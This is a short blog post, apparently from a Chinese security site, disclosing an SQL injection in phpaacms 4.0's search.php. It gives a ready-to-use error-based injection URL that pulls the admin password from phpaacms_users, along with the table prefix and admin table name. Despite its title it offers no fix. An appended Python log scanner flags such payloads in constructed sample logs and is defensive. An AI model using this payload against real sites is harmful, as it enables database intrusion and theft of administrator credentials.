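phpaacms 4.0 SQL injection 0day vulnerability and fix
phpaacms is a free, open-source, lightweight article management system (CMS).
Vulnerable file: search.php // injection caused by insufficient filtering of the variable $_GET['id']
Test EXP: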
https://www.webshell.cc/phpaacms/search.php?id=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x7e,0x27,phpaacms_users.password,0x27,0x7e)%20FROM%20`phpaa`.phpaacms_users%20LIMIT%201,1)%20)%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
Table prefix:
phpaacms_
Admin table:
phpaacms_users
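
Added example (not part of the original post): a check that scans web access logs for requests to search.php whose id parameter is not a plain integer, and labels those carrying the error-based tokens seen in the test URL above. The log lines are constructed samples, and the rule that a legitimate id is a short decimal number is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic); IPs are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /phpaacms/search.php?id=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /phpaacms/search.php?id=1%20and(select%201%20from(select%20count(*),concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 310',
    '203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "GET /phpaacms/search.php?id=7%27 HTTP/1.1" 200 298',
    '203.0.113.5 - - [01/Jan/2024:10:02:00 +0000] "GET /phpaacms/index.php?id=abc HTTP/1.1" 200 4000',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Tokens characteristic of the error-based payload shown in the post.
MARKERS = ("information_schema", "floor(rand(", "concat(", "group by")


def scan(lines):
    """Return one finding per search.php request whose id is not a plain integer."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/search.php"):
            continue
        # parse_qs percent-decodes, so encoded spaces and quotes are compared in clear.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if re.fullmatch(r"[0-9]{1,10}", value):
                continue  # assumed shape of a legitimate article id
            hits = [m for m in MARKERS if m in value.lower()]
            findings.append({
                "client": line.split()[0],
                "verdict": "error-based-sqli" if hits else "non-numeric-id",
                "markers": hits,
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
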
When reposting, please credit WebShell'S Blog. Article URL: https://www.webshell.cc/7.html